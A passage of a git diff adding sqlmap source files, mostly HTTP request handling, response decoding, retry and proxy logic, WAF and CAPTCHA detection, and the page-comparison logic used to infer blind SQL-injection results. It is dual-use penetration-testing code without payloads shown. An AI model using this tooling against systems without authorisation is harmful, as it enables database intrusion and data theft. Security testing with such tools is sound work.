"ascii" + elif encoding.find("utf8") > 0: + encoding = "utf8" + elif encoding.find("utf-8") > 0: + encoding = "utf-8" + + # Reference: http://philip.html5.org/data/charsets-2.html + if encoding in translate: + encoding = translate[encoding] + elif encoding in ("null", "{charset}", "charset", "*") or not re.search(r"\w", encoding): + return None + + # Reference: http://www.iana.org/assignments/character-sets + # Reference: http://docs.python.org/library/codecs.html + try: + codecs.lookup(encoding) + except: + encoding = None + + if encoding: + try: + six.text_type(getBytes(randomStr()), encoding) + except: + if warn: + warnMsg = "invalid web page charset '%s'" % encoding + singleTimeLogMessage(warnMsg, logging.WARN, encoding) + encoding = None + + return encoding + +def getHeuristicCharEncoding(page): + """ + Returns page encoding charset detected by usage of heuristics + + Reference: https://chardet.readthedocs.io/en/latest/usage.html + + >>> getHeuristicCharEncoding(b"") + 'ascii' + """ + + key = hash(page) + retVal = kb.cache.encoding[key] if key in kb.cache.encoding else detect(page[:HEURISTIC_PAGE_SIZE_THRESHOLD])["encoding"] + kb.cache.encoding[key] = retVal + + if retVal and retVal.lower().replace('-', "") == UNICODE_ENCODING.lower().replace('-', ""): + infoMsg = "heuristics detected web page charset '%s'" % retVal + singleTimeLogMessage(infoMsg, logging.INFO, retVal) + + return retVal + +def decodePage(page, contentEncoding, contentType, percentDecode=True): + """ + Decode compressed/charset HTTP response + + >>> getText(decodePage(b"foo&bar", None, "text/html; charset=utf-8")) + 'foo&bar' + >>> getText(decodePage(b" ", None, "text/html; charset=utf-8")) + '\\t' + """ + + if not page or (conf.nullConnection and len(page) < 2): + return getUnicode(page) + + contentEncoding = contentEncoding.lower() if hasattr(contentEncoding, "lower") else "" + contentType = contentType.lower() if hasattr(contentType, "lower") else "" + + if contentEncoding in ("gzip", "x-gzip", "deflate"): + if not kb.pageCompress: + return None + + try: + if contentEncoding == "deflate": + data = io.BytesIO(zlib.decompress(page, -15)) # Reference: http://stackoverflow.com/questions/1089662/python-inflate-and-deflate-implementations + else: + data = gzip.GzipFile("", "rb", 9, io.BytesIO(page)) + size = struct.unpack(" MAX_CONNECTION_TOTAL_SIZE: + raise Exception("size too large") + + page = data.read() + except Exception as ex: + if b" 255 else _.group(0), page) + else: + page = getUnicode(page, kb.pageEncoding) + + return page + +def processResponse(page, responseHeaders, code=None, status=None): + kb.processResponseCounter += 1 + page = page or "" + + parseResponse(page, responseHeaders if kb.processResponseCounter < PARSE_HEADERS_LIMIT else None, status) + + if not kb.tableFrom and Backend.getIdentifiedDbms() in (DBMS.ACCESS,): + kb.tableFrom = extractRegexResult(SELECT_FROM_TABLE_REGEX, page) + else: + kb.tableFrom = None + + if conf.parseErrors: + msg = extractErrorMessage(page) + + if msg: + logger.warning("parsed DBMS error message: '%s'" % msg.rstrip('.')) + + if not conf.skipWaf and kb.processResponseCounter < IDENTYWAF_PARSE_LIMIT: + rawResponse = "%s %s %s\n%s\n%s" % (_http_client.HTTPConnection._http_vsn_str, code or "", status or "", "".join(getUnicode(responseHeaders.headers if responseHeaders else [])), page[:HEURISTIC_PAGE_SIZE_THRESHOLD]) + + with kb.locks.identYwaf: + identYwaf.non_blind.clear() + if identYwaf.non_blind_check(rawResponse, silent=True): + for waf in set(identYwaf.non_blind): + if waf not in kb.identifiedWafs: + kb.identifiedWafs.add(waf) + errMsg = "WAF/IPS identified as '%s'" % identYwaf.format_name(waf) + singleTimeLogMessage(errMsg, logging.CRITICAL) + + if kb.originalPage is None: + for regex in (EVENTVALIDATION_REGEX, VIEWSTATE_REGEX): + match = re.search(regex, page) + if match and PLACE.POST in conf.parameters: + name, value = match.groups() + if PLACE.POST in conf.paramDict and name in conf.paramDict[PLACE.POST]: + if conf.paramDict[PLACE.POST][name] in page: + continue + else: + msg = "do you want to automatically adjust the value of '%s'? [y/N]" % name + + if not readInput(msg, default='N', boolean=True): + continue + + conf.paramDict[PLACE.POST][name] = value + conf.parameters[PLACE.POST] = re.sub(r"(?i)(%s=)[^&]+" % re.escape(name), r"\g<1>%s" % value.replace('\\', r'\\'), conf.parameters[PLACE.POST]) + + if not kb.browserVerification and re.search(r"(?i)browser.?verification", page or ""): + kb.browserVerification = True + warnMsg = "potential browser verification protection mechanism detected" + if re.search(r"(?i)CloudFlare", page): + warnMsg += " (CloudFlare)" + singleTimeWarnMessage(warnMsg) + + if not kb.captchaDetected and re.search(r"(?i)captcha", page or ""): + for match in re.finditer(r"(?si)", page): + if re.search(r"(?i)captcha", match.group(0)): + kb.captchaDetected = True + break + + if re.search(r"]+\brefresh\b[^>]+\bcaptcha\b", page): + kb.captchaDetected = True + + if kb.captchaDetected: + warnMsg = "potential CAPTCHA protection mechanism detected" + if re.search(r"(?i)[^<]*CloudFlare", page): + warnMsg += " (CloudFlare)" + singleTimeWarnMessage(warnMsg) + + if re.search(BLOCKED_IP_REGEX, page): + warnMsg = "it appears that you have been blocked by the target server" + singleTimeWarnMessage(warnMsg) diff --git a/src/sqlmap-master/lib/request/basicauthhandler.py b/src/sqlmap-master/lib/request/basicauthhandler.py new file mode 100644 index 0000000..a273682 --- /dev/null +++ b/src/sqlmap-master/lib/request/basicauthhandler.py @@ -0,0 +1,38 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) +See the file 'LICENSE' for copying permission +""" + +from thirdparty.six.moves import urllib as _urllib + +class SmartHTTPBasicAuthHandler(_urllib.request.HTTPBasicAuthHandler): + """ + Reference: http://selenic.com/hg/rev/6c51a5056020 + Fix for a: http://bugs.python.org/issue8797 + """ + + def __init__(self, *args, **kwargs): + _urllib.request.HTTPBasicAuthHandler.__init__(self, *args, **kwargs) + self.retried_req = set() + self.retried_count = 0 + + def reset_retry_count(self): + # Python 2.6.5 will call this on 401 or 407 errors and thus loop + # forever. We disable reset_retry_count completely and reset in + # http_error_auth_reqed instead. + pass + + def http_error_auth_reqed(self, auth_header, host, req, headers): + # Reset the retry counter once for each request. + if hash(req) not in self.retried_req: + self.retried_req.add(hash(req)) + self.retried_count = 0 + else: + if self.retried_count > 5: + raise _urllib.error.HTTPError(req.get_full_url(), 401, "basic auth failed", headers, None) + else: + self.retried_count += 1 + + return _urllib.request.HTTPBasicAuthHandler.http_error_auth_reqed(self, auth_header, host, req, headers) diff --git a/src/sqlmap-master/lib/request/chunkedhandler.py b/src/sqlmap-master/lib/request/chunkedhandler.py new file mode 100644 index 0000000..8477802 --- /dev/null +++ b/src/sqlmap-master/lib/request/chunkedhandler.py @@ -0,0 +1,41 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) +See the file 'LICENSE' for copying permission +""" + +from lib.core.data import conf +from lib.core.enums import HTTP_HEADER +from thirdparty.six.moves import urllib as _urllib + +class ChunkedHandler(_urllib.request.HTTPHandler): + """ + Ensures that HTTPHandler is working properly in case of Chunked Transfer-Encoding + """ + + def _http_request(self, request): + host = request.get_host() if hasattr(request, "get_host") else request.host + if not host: + raise _urllib.error.URLError("no host given") + + if request.data is not None: # POST + data = request.data + if not request.has_header(HTTP_HEADER.CONTENT_TYPE): + request.add_unredirected_header(HTTP_HEADER.CONTENT_TYPE, "application/x-www-form-urlencoded") + if not request.has_header(HTTP_HEADER.CONTENT_LENGTH) and not conf.chunked: + request.add_unredirected_header(HTTP_HEADER.CONTENT_LENGTH, "%d" % len(data)) + + sel_host = host + if request.has_proxy(): + sel_host = _urllib.parse.urlsplit(request.get_selector()).netloc + + if not request.has_header(HTTP_HEADER.HOST): + request.add_unredirected_header(HTTP_HEADER.HOST, sel_host) + for name, value in self.parent.addheaders: + name = name.capitalize() + if not request.has_header(name): + request.add_unredirected_header(name, value) + return request + + http_request = _http_request diff --git a/src/sqlmap-master/lib/request/comparison.py b/src/sqlmap-master/lib/request/comparison.py new file mode 100644 index 0000000..b62b899 --- /dev/null +++ b/src/sqlmap-master/lib/request/comparison.py @@ -0,0 +1,196 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) +See the file 'LICENSE' for copying permission +""" + +from __future__ import division + +import re + +from lib.core.common import extractRegexResult +from lib.core.common import getFilteredPageContent +from lib.core.common import listToStrValue +from lib.core.common import removeDynamicContent +from lib.core.common import getLastRequestHTTPError +from lib.core.common import wasLastResponseDBMSError +from lib.core.common import wasLastResponseHTTPError +from lib.core.convert import getBytes +from lib.core.data import conf +from lib.core.data import kb +from lib.core.data import logger +from lib.core.exception import SqlmapNoneDataException +from lib.core.settings import DEFAULT_PAGE_ENCODING +from lib.core.settings import DIFF_TOLERANCE +from lib.core.settings import HTML_TITLE_REGEX +from lib.core.settings import LOWER_RATIO_BOUND +from lib.core.settings import MAX_DIFFLIB_SEQUENCE_LENGTH +from lib.core.settings import MAX_RATIO +from lib.core.settings import MIN_RATIO +from lib.core.settings import REFLECTED_VALUE_MARKER +from lib.core.settings import UPPER_RATIO_BOUND +from lib.core.settings import URI_HTTP_HEADER +from lib.core.threads import getCurrentThreadData +from thirdparty import six + +def comparison(page, headers, code=None, getRatioValue=False, pageLength=None): + _ = _adjust(_comparison(page, headers, code, getRatioValue, pageLength), getRatioValue) + return _ + +def _adjust(condition, getRatioValue): + if not any((conf.string, conf.notString, conf.regexp, conf.code)): + # Negative logic approach is used in raw page comparison scheme as that what is "different" than original + # PAYLOAD.WHERE.NEGATIVE response is considered as True; in switch based approach negative logic is not + # applied as that what is by user considered as True is that what is returned by the comparison mechanism + # itself + retVal = not condition if kb.negativeLogic and condition is not None and not getRatioValue else condition + else: + retVal = condition if not getRatioValue else (MAX_RATIO if condition else MIN_RATIO) + + return retVal + +def _comparison(page, headers, code, getRatioValue, pageLength): + threadData = getCurrentThreadData() + + if kb.testMode: + threadData.lastComparisonHeaders = listToStrValue(_ for _ in headers.headers if not _.startswith("%s:" % URI_HTTP_HEADER)) if headers else "" + threadData.lastComparisonPage = page + threadData.lastComparisonCode = code + + if page is None and pageLength is None: + return None + + if any((conf.string, conf.notString, conf.regexp)): + rawResponse = "%s%s" % (listToStrValue(_ for _ in headers.headers if not _.startswith("%s:" % URI_HTTP_HEADER)) if headers else "", page) + + # String to match in page when the query is True + if conf.string: + return conf.string in rawResponse + + # String to match in page when the query is False + if conf.notString: + if conf.notString in rawResponse: + return False + else: + if kb.errorIsNone and (wasLastResponseDBMSError() or wasLastResponseHTTPError()): + return None + else: + return True + + # Regular expression to match in page when the query is True and/or valid + if conf.regexp: + return re.search(conf.regexp, rawResponse, re.I | re.M) is not None + + # HTTP code to match when the query is valid + if conf.code: + return conf.code == code + + seqMatcher = threadData.seqMatcher + seqMatcher.set_seq1(kb.pageTemplate) + + if page: + # In case of an DBMS error page return None + if kb.errorIsNone and (wasLastResponseDBMSError() or wasLastResponseHTTPError()) and not kb.negativeLogic: + if not (wasLastResponseHTTPError() and getLastRequestHTTPError() in (conf.ignoreCode or [])): + return None + + # Dynamic content lines to be excluded before comparison + if not kb.nullConnection: + page = removeDynamicContent(page) + seqMatcher.set_seq1(removeDynamicContent(kb.pageTemplate)) + + if not pageLength: + pageLength = len(page) + + if kb.nullConnection and pageLength: + if not seqMatcher.a: + errMsg = "problem occurred while retrieving original page content " + errMsg += "which prevents sqlmap from continuation. Please rerun, " + errMsg += "and if the problem persists turn off any optimization switches" + raise SqlmapNoneDataException(errMsg) + + ratio = 1. * pageLength / len(seqMatcher.a) + + if ratio > 1.: + ratio = 1. / ratio + else: + # Preventing "Unicode equal comparison failed to convert both arguments to Unicode" + # (e.g. if one page is PDF and the other is HTML) + if isinstance(seqMatcher.a, six.binary_type) and isinstance(page, six.text_type): + page = getBytes(page, kb.pageEncoding or DEFAULT_PAGE_ENCODING, "ignore") + elif isinstance(seqMatcher.a, six.text_type) and isinstance(page, six.binary_type): + seqMatcher.a = getBytes(seqMatcher.a, kb.pageEncoding or DEFAULT_PAGE_ENCODING, "ignore") + + if any(_ is None for _ in (page, seqMatcher.a)): + return None + elif seqMatcher.a and page and seqMatcher.a == page: + ratio = 1. + elif kb.skipSeqMatcher or seqMatcher.a and page and any(len(_) > MAX_DIFFLIB_SEQUENCE_LENGTH for _ in (seqMatcher.a, page)): + if not page or not seqMatcher.a: + return float(seqMatcher.a == page) + else: + ratio = 1. * len(seqMatcher.a) / len(page) + if ratio > 1: + ratio = 1. / ratio + else: + seq1, seq2 = None, None + + if conf.titles: + seq1 = extractRegexResult(HTML_TITLE_REGEX, seqMatcher.a) + seq2 = extractRegexResult(HTML_TITLE_REGEX, page) + else: + seq1 = getFilteredPageContent(seqMatcher.a, True) if conf.textOnly else seqMatcher.a + seq2 = getFilteredPageContent(page, True) if conf.textOnly else page + + if seq1 is None or seq2 is None: + return None + + seq1 = seq1.replace(REFLECTED_VALUE_MARKER, "") + seq2 = seq2.replace(REFLECTED_VALUE_MARKER, "") + + if kb.heavilyDynamic: + seq1 = seq1.split("\n") + seq2 = seq2.split("\n") + + key = None + else: + key = (hash(seq1), hash(seq2)) + + seqMatcher.set_seq1(seq1) + seqMatcher.set_seq2(seq2) + + if key in kb.cache.comparison: + ratio = kb.cache.comparison[key] + else: + ratio = round(seqMatcher.quick_ratio() if not kb.heavilyDynamic else seqMatcher.ratio(), 3) + + if key: + kb.cache.comparison[key] = ratio + + # If the url is stable and we did not set yet the match ratio and the + # current injected value changes the url page content + if kb.matchRatio is None: + if ratio >= LOWER_RATIO_BOUND and ratio <= UPPER_RATIO_BOUND: + kb.matchRatio = ratio + logger.debug("setting match ratio for current parameter to %.3f" % kb.matchRatio) + + if kb.testMode: + threadData.lastComparisonRatio = ratio + + # If it has been requested to return the ratio and not a comparison + # response + if getRatioValue: + return ratio + + elif ratio > UPPER_RATIO_BOUND: + return True + + elif ratio < LOWER_RATIO_BOUND: + return False + + elif kb.matchRatio is None: + return None + + else: + return (ratio - kb.matchRatio) > DIFF_TOLERANCE diff --git a/src/sqlmap-master/lib/request/connect.py b/src/sqlmap-master/lib/request/connect.py new file mode 100644 index 0000000..0651ded --- /dev/null +++ b/src/sqlmap-master/lib/request/connect.py @@ -0,0 +1,1610 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) +See the file 'LICENSE' for copying permission +""" + +import binascii +import inspect +import logging +import os +import random +import re +import socket +import string +import struct +import sys +import time +import traceback + +try: + import websocket + from websocket import WebSocketException +except ImportError: + class WebSocketException(Exception): + pass + +from lib.core.agent import agent +from lib.core.common import asciifyUrl +from lib.core.common import calculateDeltaSeconds +from lib.core.common import checkFile +from lib.core.common import checkSameHost +from lib.core.common import chunkSplitPostData +from lib.core.common import clearConsoleLine +from lib.core.common import dataToStdout +from lib.core.common import escapeJsonValue +from lib.core.common import evaluateCode +from lib.core.common import extractRegexResult +from lib.core.common import filterNone +from lib.core.common import findMultipartPostBoundary +from lib.core.common import getCurrentThreadData +from lib.core.common import getHeader +from lib.core.common import getHostHeader +from lib.core.common import getRequestHeader +from lib.core.common import getSafeExString +from lib.core.common import logHTTPTraffic +from lib.core.common import openFile +from lib.core.common import popValue +from lib.core.common import parseJson +from lib.core.common import pushValue +from lib.core.common import randomizeParameterValue +from lib.core.common import randomInt +from lib.core.common import randomStr +from lib.core.common import readInput +from lib.core.common import removeReflectiveValues +from lib.core.common import safeVariableNaming +from lib.core.common import singleTimeLogMessage +from lib.core.common import singleTimeWarnMessage +from lib.core.common import stdev +from lib.core.common import unArrayizeValue +from lib.core.common import unsafeVariableNaming +from lib.core.common import urldecode +from lib.core.common import urlencode +from lib.core.common import wasLastResponseDelayed +from lib.core.compat import patchHeaders +from lib.core.compat import xrange +from lib.core.convert import encodeBase64 +from lib.core.convert import getBytes +from lib.core.convert import getText +from lib.core.convert import getUnicode +from lib.core.data import cmdLineOptions +from lib.core.data import conf +from lib.core.data import kb +from lib.core.data import logger +from lib.core.datatype import AttribDict +from lib.core.decorators import stackedmethod +from lib.core.dicts import POST_HINT_CONTENT_TYPES +from lib.core.enums import ADJUST_TIME_DELAY +from lib.core.enums import AUTH_TYPE +from lib.core.enums import CUSTOM_LOGGING +from lib.core.enums import HINT +from lib.core.enums import HTTP_HEADER +from lib.core.enums import HTTPMETHOD +from lib.core.enums import NULLCONNECTION +from lib.core.enums import PAYLOAD +from lib.core.enums import PLACE +from lib.core.enums import POST_HINT +from lib.core.enums import REDIRECTION +from lib.core.enums import WEB_PLATFORM +from lib.core.exception import SqlmapCompressionException +from lib.core.exception import SqlmapConnectionException +from lib.core.exception import SqlmapGenericException +from lib.core.exception import SqlmapSkipTargetException +from lib.core.exception import SqlmapSyntaxException +from lib.core.exception import SqlmapTokenException +from lib.core.exception import SqlmapValueException +from lib.core.settings import ASTERISK_MARKER +from lib.core.settings import BOUNDARY_BACKSLASH_MARKER +from lib.core.settings import DEFAULT_CONTENT_TYPE +from lib.core.settings import DEFAULT_COOKIE_DELIMITER +from lib.core.settings import DEFAULT_GET_POST_DELIMITER +from lib.core.settings import DEFAULT_USER_AGENT +from lib.core.settings import EVALCODE_ENCODED_PREFIX +from lib.core.settings import HTTP_ACCEPT_ENCODING_HEADER_VALUE +from lib.core.settings import HTTP_ACCEPT_HEADER_VALUE +from lib.core.settings import IPS_WAF_CHECK_PAYLOAD +from lib.core.settings import IS_WIN +from lib.core.settings import JAVASCRIPT_HREF_REGEX +from lib.core.settings import LARGE_READ_TRIM_MARKER +from lib.core.settings import LIVE_COOKIES_TIMEOUT +from lib.core.settings import MAX_CONNECTION_READ_SIZE +from lib.core.settings import MAX_CONNECTIONS_REGEX +from lib.core.settings import MAX_CONNECTION_TOTAL_SIZE +from lib.core.settings import MAX_CONSECUTIVE_CONNECTION_ERRORS +from lib.core.settings import MAX_MURPHY_SLEEP_TIME +from lib.core.settings import META_REFRESH_REGEX +from lib.core.settings import MAX_TIME_RESPONSES +from lib.core.settings import MIN_TIME_RESPONSES +from lib.core.settings import PAYLOAD_DELIMITER +from lib.core.settings import PERMISSION_DENIED_REGEX +from lib.core.settings import PLAIN_TEXT_CONTENT_TYPE +from lib.core.settings import RANDOM_INTEGER_MARKER +from lib.core.settings import RANDOM_STRING_MARKER +from lib.core.settings import REPLACEMENT_MARKER +from lib.core.settings import SAFE_HEX_MARKER +from lib.core.settings import TEXT_CONTENT_TYPE_REGEX +from lib.core.settings import UNENCODED_ORIGINAL_VALUE +from lib.core.settings import UNICODE_ENCODING +from lib.core.settings import URI_HTTP_HEADER +from lib.core.settings import WARN_TIME_STDEV +from lib.core.settings import WEBSOCKET_INITIAL_TIMEOUT +from lib.core.settings import YUGE_FACTOR +from lib.request.basic import decodePage +from lib.request.basic import forgeHeaders +from lib.request.basic import processResponse +from lib.request.comparison import comparison +from lib.request.direct import direct +from lib.request.methodrequest import MethodRequest +from lib.utils.safe2bin import safecharencode +from thirdparty import six +from thirdparty.odict import OrderedDict +from thirdparty.six import unichr as _unichr +from thirdparty.six.moves import http_client as _http_client +from thirdparty.six.moves import urllib as _urllib +from thirdparty.socks.socks import ProxyError + +class Connect(object): + """ + This class defines methods used to perform HTTP requests + """ + + @staticmethod + def _getPageProxy(**kwargs): + try: + if (len(inspect.stack()) > sys.getrecursionlimit() // 2): # Note: https://github.com/sqlmapproject/sqlmap/issues/4525 + warnMsg = "unable to connect to the target URL" + raise SqlmapConnectionException(warnMsg) + except (TypeError, UnicodeError): + pass + + try: + return Connect.getPage(**kwargs) + except RuntimeError: + return None, None, None + + @staticmethod + def _retryProxy(**kwargs): + threadData = getCurrentThreadData() + threadData.retriesCount += 1 + + if conf.proxyList and threadData.retriesCount >= conf.retries and not kb.locks.handlers.locked(): + warnMsg = "changing proxy" + logger.warning(warnMsg) + + conf.proxy = None + threadData.retriesCount = 0 + + setHTTPHandlers() + + if kb.testMode and kb.previousMethod == PAYLOAD.METHOD.TIME: + # timed based payloads can cause web server unresponsiveness + # if the injectable piece of code is some kind of JOIN-like query + warnMsg = "most likely web server instance hasn't recovered yet " + warnMsg += "from previous timed based payload. If the problem " + warnMsg += "persists please wait for a few minutes and rerun " + warnMsg += "without flag 'T' in option '--technique' " + warnMsg += "(e.g. '--flush-session --technique=BEUS') or try to " + warnMsg += "lower the value of option '--time-sec' (e.g. '--time-sec=2')" + singleTimeWarnMessage(warnMsg) + + elif kb.originalPage is None: + if conf.tor: + warnMsg = "please make sure that you have " + warnMsg += "Tor installed and running so " + warnMsg += "you could successfully use " + warnMsg += "switch '--tor' " + if IS_WIN: + warnMsg += "(e.g. 'https://www.torproject.org/download/')" + else: + warnMsg += "(e.g. 'https://help.ubuntu.com/community/Tor')" + else: + warnMsg = "if the problem persists please check that the provided " + warnMsg += "target URL is reachable" + + items = [] + if not conf.randomAgent: + items.append("switch '--random-agent'") + if not any((conf.proxy, conf.proxyFile, conf.tor)): + items.append("proxy switches ('--proxy', '--proxy-file'...)") + if items: + warnMsg += ". In case that it is, " + warnMsg += "you can try to rerun with " + warnMsg += " and/or ".join(items) + + singleTimeWarnMessage(warnMsg) + + elif conf.threads > 1: + warnMsg = "if the problem persists please try to lower " + warnMsg += "the number of used threads (option '--threads')" + singleTimeWarnMessage(warnMsg) + + kwargs['retrying'] = True + return Connect._getPageProxy(**kwargs) + + @staticmethod + def _connReadProxy(conn): + retVal = b"" + + if not kb.dnsMode and conn: + headers = conn.info() + if kb.pageCompress and headers and hasattr(headers, "getheader") and (headers.getheader(HTTP_HEADER.CONTENT_ENCODING, "").lower() in ("gzip", "deflate") or "text" not in headers.getheader(HTTP_HEADER.CONTENT_TYPE, "").lower()): + retVal = conn.read(MAX_CONNECTION_TOTAL_SIZE) + if len(retVal) == MAX_CONNECTION_TOTAL_SIZE: + warnMsg = "large compressed response detected. Disabling compression" + singleTimeWarnMessage(warnMsg) + kb.pageCompress = False + raise SqlmapCompressionException + else: + while True: + if not conn: + break + else: + try: + part = conn.read(MAX_CONNECTION_READ_SIZE) + except AssertionError: + part = b"" + + if len(part) == MAX_CONNECTION_READ_SIZE: + warnMsg = "large response detected. This could take a while" + singleTimeWarnMessage(warnMsg) + part = re.sub(getBytes(r"(?si)%s.+?%s" % (kb.chars.stop, kb.chars.start)), getBytes("%s%s%s" % (kb.chars.stop, LARGE_READ_TRIM_MARKER, kb.chars.start)), part) + retVal += part + else: + retVal += part + break + + if len(retVal) > MAX_CONNECTION_TOTAL_SIZE: + warnMsg = "too large response detected. Automatically trimming it" + singleTimeWarnMessage(warnMsg) + break + + if conf.yuge: + retVal = YUGE_FACTOR * retVal + + return retVal + + @staticmethod + def getPage(**kwargs): + """ + This method connects to the target URL or proxy and returns + the target URL page content + """ + + if conf.offline: + return None, None, None + + url = kwargs.get("url", None) or conf.url + get = kwargs.get("get", None) + post = kwargs.get("post", None) + method = kwargs.get("method", None) + cookie = kwargs.get("cookie", None) + ua = kwargs.get("ua", None) or conf.agent + referer = kwargs.get("referer", None) or conf.referer + direct_ = kwargs.get("direct", False) + multipart = kwargs.get("multipart", None) + silent = kwargs.get("silent", False) + raise404 = kwargs.get("raise404", True) + timeout = kwargs.get("timeout", None) or conf.timeout + auxHeaders = kwargs.get("auxHeaders", None) + response = kwargs.get("response", False) + ignoreTimeout = kwargs.get("ignoreTimeout", False) or kb.ignoreTimeout or conf.ignoreTimeouts + refreshing = kwargs.get("refreshing", False) + retrying = kwargs.get("retrying", False) + crawling = kwargs.get("crawling", False) + checking = kwargs.get("checking", False) + skipRead = kwargs.get("skipRead", False) + finalCode = kwargs.get("finalCode", False) + chunked = kwargs.get("chunked", False) or conf.chunked + + if isinstance(conf.delay, (int, float)) and conf.delay > 0: + time.sleep(conf.delay) + + start = time.time() + + threadData = getCurrentThreadData() + with kb.locks.request: + kb.requestCounter += 1 + threadData.lastRequestUID = kb.requestCounter + + if conf.proxyFreq: + if kb.requestCounter % conf.proxyFreq == 0: + conf.proxy = None + + warnMsg = "changing proxy" + logger.warning(warnMsg) + + setHTTPHandlers() + + if conf.dummy or conf.murphyRate and randomInt() % conf.murphyRate == 0: + if conf.murphyRate: + time.sleep(randomInt() % (MAX_MURPHY_SLEEP_TIME + 1)) + + page, headers, code = randomStr(int(randomInt()), alphabet=[_unichr(_) for _ in xrange(256)]), None, None if not conf.murphyRate else randomInt(3) + + threadData.lastPage = page + threadData.lastCode = code + + return page, headers, code + + if conf.liveCookies: + with kb.locks.liveCookies: + if not checkFile(conf.liveCookies, raiseOnError=False) or os.path.getsize(conf.liveCookies) == 0: + warnMsg = "[%s] [WARNING] live cookies file '%s' is empty or non-existent. Waiting for timeout (%d seconds)" % (time.strftime("%X"), conf.liveCookies, LIVE_COOKIES_TIMEOUT) + dataToStdout(warnMsg) + + valid = False + for _ in xrange(LIVE_COOKIES_TIMEOUT): + if checkFile(conf.liveCookies, raiseOnError=False) and os.path.getsize(conf.liveCookies) > 0: + valid = True + break + else: + dataToStdout('.') + time.sleep(1) + + dataToStdout("\n") + + if not valid: + errMsg = "problem occurred while loading cookies from file '%s'" % conf.liveCookies + raise SqlmapValueException(errMsg) + + cookie = openFile(conf.liveCookies).read().strip() + cookie = re.sub(r"(?i)\ACookie:\s*", "", cookie) + + if multipart: + post = multipart + else: + if not post: + chunked = False + + elif chunked: + post = _urllib.parse.unquote(post) + post = chunkSplitPostData(post) + + webSocket = url.lower().startswith("ws") + + if not _urllib.parse.urlsplit(url).netloc: + url = _urllib.parse.urljoin(conf.url, url) + + # flag to know if we are dealing with the same target host + target = checkSameHost(url, conf.url) + + if not retrying: + # Reset the number of connection retries + threadData.retriesCount = 0 + + # fix for known issue when urllib2 just skips the other part of provided + # url splitted with space char while urlencoding it in the later phase + url = url.replace(" ", "%20") + + if "://" not in url: + url = "http://%s" % url + + conn = None + page = None + code = None + status = None + + _ = _urllib.parse.urlsplit(url) + requestMsg = u"HTTP request [#%d]:\r\n%s " % (threadData.lastRequestUID, method or (HTTPMETHOD.POST if post is not None else HTTPMETHOD.GET)) + requestMsg += getUnicode(("%s%s" % (_.path or "/", ("?%s" % _.query) if _.query else "")) if not any((refreshing, crawling, checking)) else url) + responseMsg = u"HTTP response " + requestHeaders = u"" + responseHeaders = None + logHeaders = u"" + skipLogTraffic = False + + raise404 = raise404 and not kb.ignoreNotFound + + # support for non-latin (e.g. cyrillic) URLs as urllib/urllib2 doesn't + # support those by default + url = asciifyUrl(url) + + try: + socket.setdefaulttimeout(timeout) + + if direct_: + if '?' in url: + url, params = url.split('?', 1) + params = urlencode(params) + url = "%s?%s" % (url, params) + + elif any((refreshing, crawling, checking)): + pass + + elif target: + if conf.forceSSL: + url = re.sub(r"(?i)\A(http|ws):", r"\g<1>s:", url) + url = re.sub(r"(?i):80/", ":443/", url) + + if PLACE.GET in conf.parameters and not get: + get = conf.parameters[PLACE.GET] + + if not conf.skipUrlEncode: + get = urlencode(get, limit=True) + + if get: + if '?' in url: + url = "%s%s%s" % (url, DEFAULT_GET_POST_DELIMITER, get) + requestMsg += "%s%s" % (DEFAULT_GET_POST_DELIMITER, get) + else: + url = "%s?%s" % (url, get) + requestMsg += "?%s" % get + + if PLACE.POST in conf.parameters and not post and method != HTTPMETHOD.GET: + post = conf.parameters[PLACE.POST] + + elif get: + url = "%s?%s" % (url, get) + requestMsg += "?%s" % get + + requestMsg += " %s" % _http_client.HTTPConnection._http_vsn_str + + # Prepare HTTP headers + headers = forgeHeaders({HTTP_HEADER.COOKIE: cookie, HTTP_HEADER.USER_AGENT: ua, HTTP_HEADER.REFERER: referer, HTTP_HEADER.HOST: getHeader(dict(conf.httpHeaders), HTTP_HEADER.HOST) or getHostHeader(url)}, base=None if target else {}) + + if HTTP_HEADER.COOKIE in headers: + cookie = headers[HTTP_HEADER.COOKIE] + + if kb.authHeader: + headers[HTTP_HEADER.AUTHORIZATION] = kb.authHeader + + if kb.proxyAuthHeader: + headers[HTTP_HEADER.PROXY_AUTHORIZATION] = kb.proxyAuthHeader + + if not conf.requestFile or not target: + if not getHeader(headers, HTTP_HEADER.ACCEPT): + headers[HTTP_HEADER.ACCEPT] = HTTP_ACCEPT_HEADER_VALUE + + if not getHeader(headers, HTTP_HEADER.ACCEPT_ENCODING): + headers[HTTP_HEADER.ACCEPT_ENCODING] = HTTP_ACCEPT_ENCODING_HEADER_VALUE if kb.pageCompress else "identity" + + elif conf.requestFile and getHeader(headers, HTTP_HEADER.USER_AGENT) == DEFAULT_USER_AGENT: + for header in headers: + if header.upper() == HTTP_HEADER.USER_AGENT.upper(): + del headers[header] + break + + if post is not None and not multipart and not getHeader(headers, HTTP_HEADER.CONTENT_TYPE): + headers[HTTP_HEADER.CONTENT_TYPE] = POST_HINT_CONTENT_TYPES.get(kb.postHint, DEFAULT_CONTENT_TYPE if unArrayizeValue(conf.base64Parameter) != HTTPMETHOD.POST else PLAIN_TEXT_CONTENT_TYPE) + + if headers.get(HTTP_HEADER.CONTENT_TYPE) == POST_HINT_CONTENT_TYPES[POST_HINT.MULTIPART]: + warnMsg = "missing 'boundary parameter' in '%s' header. " % HTTP_HEADER.CONTENT_TYPE + warnMsg += "Will try to reconstruct" + singleTimeWarnMessage(warnMsg) + + boundary = findMultipartPostBoundary(conf.data) + if boundary: + headers[HTTP_HEADER.CONTENT_TYPE] = "%s; boundary=%s" % (headers[HTTP_HEADER.CONTENT_TYPE], boundary) + + if conf.keepAlive: + headers[HTTP_HEADER.CONNECTION] = "keep-alive" + + if chunked: + headers[HTTP_HEADER.TRANSFER_ENCODING] = "chunked" + + if auxHeaders: + headers = forgeHeaders(auxHeaders, headers) + + if kb.headersFile: + content = openFile(kb.headersFile, "rb").read() + for line in content.split("\n"): + line = getText(line.strip()) + if ':' in line: + header, value = line.split(':', 1) + headers[header] = value + + if conf.localhost: + headers[HTTP_HEADER.HOST] = "localhost" + + for key, value in list(headers.items()): + if key.upper() == HTTP_HEADER.ACCEPT_ENCODING.upper(): + value = 